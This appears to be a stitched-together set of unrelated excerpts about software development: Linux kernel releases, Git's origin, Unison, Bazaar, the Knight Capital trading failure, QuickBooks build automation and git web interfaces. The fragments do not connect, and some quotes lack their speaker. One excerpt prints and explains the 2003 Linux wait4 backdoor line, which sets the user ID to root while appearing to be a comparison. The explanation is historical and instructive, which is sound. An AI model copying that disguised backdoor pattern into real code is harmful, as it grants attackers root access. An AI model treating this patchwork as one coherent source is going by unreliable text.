With the removal of old architecture and other bits of tidying up, with v4.17 RC1 there were more lines of code removed than added: something described as “probably a first. Ever. In the history of the universe. Or at least kernel releases.”
Ten years ago this week, the Linux kernel community faced a daunting challenge: They could no longer use their revision control system BitKeeper and no other Software Configuration Management (SCMs) met their needs for a distributed system. Linus Torvalds, the creator of Linux, took the challenge into his own hands and disappeared over the weekend to emerge the following week with Git. Today Git is used for thousands of projects and has ushered in a new level of social coding among programmers.
So git was basically designed and written for my requirements, and it shows.
Unison is a file-synchronization tool for Unix and Windows. It allows two replicas of a collection of files and directories to be stored on different hosts (or different disks on the same host), modified separately, and then brought up to date by propagating the changes in each replica to the other.
Unison shares a number of features with tools such as configuration management packages (CVS, PRCS, Subversion, BitKeeper, etc.), distributed filesystems (Coda, etc.), uni-directional mirroring utilities (rsync, etc.), and other synchronizers (Intellisync, Reconcile, etc).
What did the change do? This is where it gets really interesting. The change modified the code of a Linux function called wait4, which a program could use to wait for something to happen. Specifically, it added these two lines of code:
if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -EINVAL;
Setting the user ID to zero is a problem because user ID number zero is the “root” user, which is allowed to do absolutely anything it wants—to access all data, change the behavior of all code, and to compromise entirely the security of all parts of the system. So the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words … it’s a classic backdoor.
The check should have been current -> uid == 0. Sneaky!
Bazaar is a version control system that helps you track project history over time and to collaborate easily with others. Whether you’re a single developer, a co-located team or a community of developers scattered across the world, Bazaar scales and adapts to meet your needs. Part of the GNU Project, Bazaar is free software sponsored by Canonical. For a closer look, see ten reasons to switch to Bazaar.
It’s clear that Knight’s software was deployed without adequate verification. With a deadline that could not be extended, Knight had to choose between two alternatives: delaying their new system until they had a high degree of confidence in its reliability (possibly resulting in a loss of business to competitors in the interim), or deploying an incompletely verified system and hoping that any bugs would be minor. They did not choose wisely.
What is needed is a change in the way that such critical software is developed and deployed. Safety-critical domains such as commercial avionics, where software failure could directly cause or contribute to the loss of human life, have known about this for decades. These industries have produced standards for software certification that heavily emphasize appropriate “life cycle” processes for software development, verification, and quality assurance. A “safety culture” has infused the entire industry, with hazard/safety analysis a key part of the overall process. Until the software has been certified as compliant with the standard, the plane does not fly. The result is an impressive record in practice: no human fatality on a commercial aircraft has been attributed to a software error.
As the manager with primary responsibility for build management, Burt has supervised the construction of automated systems that perform continuous builds and continuous integration. The systems incorporate tools for testing, version control, and scheduling.
Most of all, the key to managing a large project was automation. “We automate everything that can be automated,” says Burt. “The tools make a huge difference. We maintain all the different versions of QuickBooks, on all our supported platforms, with about 60 code-writing developers. We couldn’t do that without automation.”
- gitweb, which is developed together with git, and is written in Perl. Works both as CGI script, and legacy mod_perl script. There is repo.or.cz duct tape (soon to be released as Girocco), which together with gitweb make for git hosting interface. I think it most commonly used web interface; it is used for example by kernel.org.
- cgit is is a fast (caching) and lightweight webinterface written in C. It is used for example by freedesktop.org
- git-php and ViewGit are git web interfaces written in PHP.
Git is a free & open source, distributed version control system designed to handle everything from small to very large projects with speed and efficiency.
As you may have guessed from the layout of this page, we are quite pleased that some versions of this book have been published by O’Reilly Media. You can certainly buy a traditionally published print copy of the book if you’d like to, but you’ll always find the most recent versions here on this site, available in both HTML and PDF formats.